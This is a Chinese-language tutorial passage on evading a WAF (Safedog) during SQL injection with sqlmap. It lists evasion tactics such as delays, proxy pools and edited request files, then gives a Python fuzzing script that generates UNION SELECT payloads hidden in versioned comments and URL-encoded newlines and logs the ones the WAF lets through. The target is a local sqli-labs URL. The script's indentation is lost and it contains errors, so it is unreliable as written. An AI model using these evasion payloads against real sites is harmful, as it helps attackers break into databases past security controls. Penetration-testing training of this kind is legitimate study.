十九：SQL注入之SQLMAP绕WAF

攻防实战中，需要掌握一些特性，比如数据库，服务器，应用层，WAF层，以便更灵活的构造payload，甚至绕过安全防护措施进行漏洞利用。

sqlmap绕狗子时候，如果写的py脚本被拦截，有三种方式，延时，爬虫探测，代理池
其他参数狗子检测时，先保存为txt文本，然后-r，进行绕过，也可以中转注入进行本地数据包修改而后注入，本地搭建脚本（请求数据包自定义编写）
也可以写入本地php数据包，修改header头

import request,time

url='http://127.0.0.1/sqlilabs/less-2/?id=-1'
union = 'union'
select = 'select'
num = '1,2,3'
a = {'%0a','%23'}
aa= {'x'}
aaa = {'%0a','%23'}
b = '/!'
c = '/'
def bypass():
for du in a:
for dus in aa:
for duss in aaa:
for two in range(44500,44600): #版本号
urls=url+du+dus+duss+b+str(two)+union+c+du+dus+duss+select+du+dus+duss+num

urls = url + du +dus +duss+union +du +dus +duss +b +str(two)+select+c +du+dus+duss+num

try:
result = request.get(urls).text
len_r = len(result)
if (result.find('safedog')==-1):
print('bypass url addres :' + urls + '|' +str(len_r))
if len_r == 715:
fp = open('url.txt','a+')
fp.write(urls+'\n')
fp.close()
except Exception as err:
print('connecting error')
time.sleep(0,1)
if name == 'main':
print('fuzz start!')
bypass()